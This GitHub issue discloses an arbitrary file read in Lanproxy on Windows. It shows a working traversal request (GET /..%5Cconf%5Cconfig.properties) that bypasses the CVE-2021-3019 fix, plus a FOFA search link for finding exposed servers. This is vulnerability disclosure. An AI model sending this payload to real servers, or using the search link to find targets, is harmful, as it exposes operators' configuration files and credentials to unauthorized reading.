The latest version of Lanproxy has an arbitrary file read vulnerability on Windows

因为准备申请一下CVE 所以还是用英文吧....

Lanproxy originally existed CVE-2021-3019

The repair method is as follows

![image](https://github.com/user-attachments/assets/73a03fe7-a627-486a-933e-c5d0a7503572)

It is obvious that this repair method did not consider bypassing on Windows servers

so we use payload

```python
GET /..%5Cconf%5Cconfig.properties HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4


```
![image](https://github.com/user-attachments/assets/8343ba90-09c1-47ae-a162-5c351d221ba2)

fofa: https://fofa.info/result?q=%22Server%3A%20LPS-0.1%22&qbase64=IlNlcnZlcjogTFBTLTAuMSI%3D
![image](https://github.com/user-attachments/assets/d7a764f7-8225-4935-917f-cc4ea76d8aac)

of course, due to the directory traversal feature, this only applies to Windows servers

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

The latest version of Lanproxy has an arbitrary file read vulnerability on Windows #192

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

The latest version of Lanproxy has an arbitrary file read vulnerability on Windows #192

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions